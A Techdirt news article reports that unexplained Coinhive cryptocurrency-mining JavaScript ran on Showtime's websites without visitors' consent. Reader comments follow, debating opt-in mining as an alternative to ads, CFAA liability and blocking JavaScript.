Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency
from the whoops-a-daisy dept
Showtime’s websites recently began covertly hijacking user browsers to mine cryptocurrency, and neither Showtime nor its parent company CBS appear interested in explaining how or why it happened. The code in question — a bit of JavaScript dubbed Coinhive, was embedded in two different Showtime domains: Showtime.com and Showtimeanytime.com. When a visitor visited these domains, their browser was hijacked and their computer was forced to help mine Monero, a new privacy-centric alternative to bitcoin currently valued at around $92 each.
The mining software was first noticed by a Twitter user who discovered the Coinhive miner buried early on in the source code:
@briankrebs https://t.co/fnk275wEj9 has a Cryptocurrency miner in the source code pic.twitter.com/XE80sMRJVe
— SkensNet (@skensnet) September 23, 2017
Users weren’t alerted that this was happening, and visitors reportedly found the mining software utilized up to 80% of a visiting user’s CPU cycles. Such miners can also notably drain battery life for visitors on mobile devices. And as of this writing, Showtime has been completely unwilling to confirm that this occurred, much less explain how the code appeared. The company has refused to respond to numerous requests for comment from a myriad of websites, Techdirt included. The code appeared in the evening of September 23, and had disappeared by the next Monday morning.
It seems relatively unlikely that executives or developers at Showtime thought it would be a good idea to hijack the browsers of potential customers to mine cryptocurrency, leading many to believe that Showtime’s servers were likely hacked by somebody looking to covertly make a little extra money:
“The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers’ pages, so the code must have come from another source ? or was injected by miscreants who had compromised Showtime’s systems.”
That said, it’s not impossible that Showtime was running an experiment. Cryptocurrency miners have been making headlines in recent weeks after The Pirate Bay was caught also covertly using Coinhive to hijack visitor browsers to make extra bank. Coinhive only just launched September 14, advertising itself as a creative alternative to the traditional advertising model. But after users over at the Pirate Bay subreddit discovered the practice and began to complain, the website was forced to pull the software from its code and issued a relatively flimsy mea culpa:
“As you may have noticed we are testing a Monero javascript miner. This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running.”
Except covertly hijacking a browser with glorified malware obviously isn’t a great way of “keeping a site running,” especially if websites running to embrace Coinhive refuse to let users opt out — much less inform them this is even happening. Not surprisingly, the recent rise in such stealth cryptocurrency miners has resulted in Adblock Plus moving to help block such hijacks. Malwarebytes analyst J?r?me Segura warns in a blog post that some websites appear unsurprisingly intent on “pushing the limits towards a really bad user experience”:
“Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience. The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.”
Again, there are creative alternatives to advertising, and then there’s just being an asshole. Hijacking a visitor’s browser, CPU and electricity to mine cryptocurrency without informing them — or letting them opt out — sits firmly in the latter category.
Filed Under: coinhive, hijacking, javascript, monero, showtime
Companies: cbs, showtime
Comments on “Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency”
Interesting idea though
Sadly the bad actors are going to kill all chances of it working, but does make me wonder.
What if you ran a site and just had clean banner at the top politely asking people to please run the miner to support you? It could actually be a good alternative to ads… So long as it is done clearly upfront and Opt-in only.
Re: Interesting idea though
Agree, but it is a sure sign of how these assholes operate.
It is is not shady, spying, controlling, or domineering… they are not interested!
Re: Interesting idea though
Hey guys, you could do this. I’d spend electricity on you.
Re: Re: Interesting idea though
I’d gladly let them coopt my CPU for cryptocurrency mining if it meant I didn’t have to watch commercials.
But they’d have to inform me upfront, provide an alternative, and the experience has to be positive (none of this buffering and dropping connections crap).
Re: Interesting idea though
That is an interesting idea. Can these miners limit the amount of CPU usage they use? Or let the user determine how much of the CPU is used?
I’d like to see the math on that and compare it to ad revenue. Would it be more? Less? Equal to?
I loath ads with every fiber of my being. But I would definitely volunteer some CPU time during my visits.
Re: Re: Interesting idea though
It’d be interesting to have a revenue scheme that involved letting a miner generate credit. Run our particular miner for X amount of time and pick a season to view. It definitely blurs the lines of currency, but I think it would be an interesting proposition.
Re: Interesting idea though
This was the idea behind Tidbit, but they were shut down.
https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/
Re: Re: Interesting idea though
Rightly so, same should be done to showtime, but the problem is that tidbit is in the wrong class of humans.
Any website that runs code that performs work to consume resources at the expense of the consumer, especially without any notice/permission, is against the CFAA.
As a user I expect to pay for the electricity and my costs to connect to the infrastructure and to consume bandwidth to display/interact with the services that a website is offering. The moment they start consuming any of my resources to make them money without first obtaining explicit permission then they are criminally liable for every watt my CPU consumes crunching their code!
I am okay with this replacing ads, but only as long as I am notified that my machine is now being used like this and given a choice to participate or not!
It should be illegal for a website to require someone to allow their computer to become a botnet, even it temporary, to consume a website!
Re: Re: Re: Interesting idea though
This has the makings of a very entertaining slippery slope. Suppose a website could lay out its content properly, as a static page on the server, which is then sent verbatim to clients; or they could indulge their JavaScript addiction and make the client do all the work laying out the page. The latter will be slightly more CPU efficient for the server (although globally much less efficient since each client would perform the work independently, rather than asking the server to do it once), thus saving them money by requiring the client to perform extra work to use the page. Frequently, such client-side rendered pages are at best equivalent, and usually far worse, user experience than doing it properly on the server (hence satisfying your "at the expense of the consumer"). Would that rise to a CFAA claim under your standard? It feels like it shouldn’t, but it’d be greatly entertaining if it did, because then most Javascript addicted sites could be chased for CFAA. 😀
Re: Re: Re:2 Interesting idea though
All modern web frameworks that work as single page apps (Ember, React, Angular) do just what is being talked about. They render the HTML once, and then only send JSON data blocks back from the server and the browser/JS does the unpacking and processing and re-rendering.
If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.
BTW, “asking the server to do it once” is mostly incorrect except on the simplest web pages because injecting any amount of personalization into a page requires the server to render the page for each user.
Re: Re: Re:3 Interesting idea though
Your points are valid wrt any actions initiated by the user … however it appears that the article is discussing other non user initiated activity performed upon user’s machine without their knowledge/consent.
What would happen if the unnecessary activity initiated by the website visited by a user who is not aware of said activity … were to be found illegal? Who is responsible? How does said user defend against this?
Re: Re: Re:3 Interesting idea though
“If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.”
Remember, CFAA explicitly states that any usage of a computer that gains access without authorization or attempts to perform a task that exceeds current authorization is abuse.
A website running code to perform its function for serving up content is legit for the obvious reasons. However, the point where the code is now executing something that is “not useful” to that purpose means they exceeded authorization.
Just visiting a page is NOT authorization to just run any code on the visiting machine.
I think the problem here is that once again, we allow companies too much latitude in what they do, just throwing the doors wide open until the abuse is TOO obvious to the point where pretzel logic cannot defend it. This is what created the problem of IoT vulnerability.
Imagine if a store asked all of its customers to process a mathematical equation when they enter the door or face getting kicked out. The more we allow this to continue, the more slippery that slope gets.
Re: Re: Re:3 Interesting idea though
Actually, my experience has been that they render the HTML exactly zero times, then send a blob of Javascript to the client to construct the page. That’s what causes them to be so utterly broken for users who wisely block Javascript. If they did it right, the Javascript would be a progressive enhancement on top of an already usable page. Most sites instead do it dead wrong and make the page totally unusable unless you pull in untrusted scripts from half a dozen different servers.
Personally, I never authorize any site I visit to run Javascript on my computer. Under the frequently twisted interpretation of the CFAA, since I don’t want it to happen, and yet it happens, it must be a CFAA violation. 😉
I know. I can dream though.
Sure, personalization requires customization. That’s obvious. But how often are personalized pages actually necessary when viewing content that is functionally identical across all users (e.g. listing of current news or thread titles in a forum)? There are way too many sites that have decided that everything that could possibly be personalized must be, whether or not it makes any sense.
Re: Re: Re: Interesting idea though
It IS.
Re: Interesting idea though
No.
“We’ve turned this on guys, please do it” is no less acceptable than “….”
That’s a “please help us fix business model problems and oh give us more $$”
Re: Interesting idea though
…I don’t know about you, but I keep literally 10+ tabs open at a time.
What would happen if all 10 of those sites tried to make my computer mine crypto-currency for them?
Even the best computers would probably choke and crash under that onslaught.
Or the computer’s anti-virus would start alerting the user like crazy that someone’s trying to inject malware on your computer.
Hey Mike Masnick – are you still living with javascript disabled in your browsers? Wondering if that is even possible is today’s .js driven web world. Because more and more javascript seems like a security weaknesses.
Re: Re:
I’m not Mike Masnick, but I’ve blocked Javascript in my browsers for many years now — only allowing it permanently from a few dozen sites, only allowing it temporarily on a limited basis. Yes, this sometimes breaks things, and yes, there are a lot of sites that pull Javascript from WAY too many sources (Techdirt appears to be using 16) but rampant abuse has made it necessary — just as it’s become necessary to block all advertising.
Re: Re: Re:
Seconded
JS is a well known vector for malware, many times embedded in ads.
Re: Re: Re: Re:
ditto 3rd
Re: Re: Re:2 Re:
ditto.
Been using javascript blocking for years. In the early days I’d have JS disabled entirely in the browser, then used addons that added a button to disable/enable it, then later ones that allowed per-site, then still later the more advanced ones like noscript, policeman, umatrix, and so on that allow blocking not just on the site, but subdomains, cross-site, and so on.
Re: Re:
I think i’ve seen Mike link to sites that don’t work without JS. He must have it enabled. But I don’t and Techdirt still works. Lots of sites haven’t tested obviously–sometimes the pages are just blank or "links" don’t work, sometimes you get an "enable javascript" message (don’t–it only encourages them).
Re: Re: Re:
“-sometimes the pages are just blank”
If you’re using Firefox, oftentimes you can click the book icon next to the URL bar and magically the words appear.
Re: Re: Re: Re:
Yeah, turning off stylesheets works too sometimes. (View / Page Style / No Style) I still don’t know why anyone would set their page to be invisible by default.
I'd love to see the disclaimer for this in the future...
“This website uses embedded crypto-currency mining software the borrows from your computer’s processing power. Please be aware that by visiting this website you agree to help us generate swaths of grey market currency while driving up your energy consumption, reducing the responsiveness of all your other programs, and possibly hurting your net bandwidth usage.
Also something something tracking cookies
[[I Accept]]”
What if this was done to a user....
….who is operating in a legal jurisdiction that has banned cryptocurrencies? (In other words, what if forcing this on a user caused them to commit a crime?)
Re: What if this was done to a user....
Has there been anywhere that has banned mining it? I only know places that have banned using it.
Re: Re: What if this was done to a user....
Well isn’t banning the use of it kind of banning the mining of it by default?
If you’re mining it obviously you intend on ‘using’ it in some way when you sell it/spend it later.
Sounds like theft of service to me, wonder if the DA or whomever is interested in prosecuting these scumbuckets.
Even more the reason to just torrent the latest Star Trek and anything else made by CBS.
If they’re going to abuse technology to steal from us, what’s wrong with us doing it to them?
Re: Re:
I just keep thinking, if I pirate Star Trek does that make me a space pirate? I’m just going to pretend it does because it is awesome and go watch me some Star Trek.
The real question is why are you letting these sites run proprietary scripts on your computer?
I have traced back a lot of this type of activity to ads on web pages that are served by ad networks. A telephone company in India would setoff botnet alerts on our network whenever anyone of our employees went there. The alerts were for the browser trying to reach coinbase servers once the ad loaded up and started the mining process.
I actually think it is a great idea. But definitely has to be permission based. Start them on a regular add full experience and then offer the add free version for 20% of your CPU/GPU.
Oh look…Another good use for the NoScript browser Addon. Also, a good reason to NEVER leave a browser open on your computer. You have no idea what’s running “Behind the scenes”.
Get used to it
Tim Berners Lee recently enabled corporations to to this without you being allowed to find out..
It is called EME in combination with DMCA 1201. See https://boingboing.net/2017/09/18/antifeatures-for-all.html
Once the corporate overlords understand the process it will be everywhere.
Maybe then there will be some political pushback.
Re: Get used to it
Should I keep copies of old browsers?
All along you are saying “the legacy industry should learn from piracy”. Now they do, and you are upset.
Who started this issue recently? The Pirate Bay. Didn’t read any outraged comments then, even when they were running a miner that would knock your cpu usage to 100%.
Ahh, the double standards!
Re: Re:
All along you are saying "the legacy industry should learn from piracy". Now they do, and you are upset.
A statement as stupid as ‘You were complaining that the restaurant didn’t have good food, and now that they’ve taken to adding a $20 charge to the bill because screw you you’re upset?’
Or how about ‘People were complaining that movies were too expensive, and now that they’ve decided to just download them for free you’re upset’, would you accept that as valid?
Assuming it was done by the ones running the site itself(possible, and their refusal to explain anything certainly isn’t helping) then ‘Ads aren’t bringing in as much, let’s hijack our visitor’s system resources‘ is not a valid response, whereas being upset about a site serving up malware most certainly is.
Whether or not The Pirate Bay did something similar is besides the point, it wasn’t acceptable then, and it’s not acceptable now, so once again your attempt at a ‘Gotcha’ falls flat.
Re: Re:
But the DRM that fucks over your computer from the CD you purchased legally is somehow hunky-dory to you…
Let me make a little prediction that someone is going to hang by their testicles for this.
Because they can. That’s why corruption, spying, etc. exists in the first place.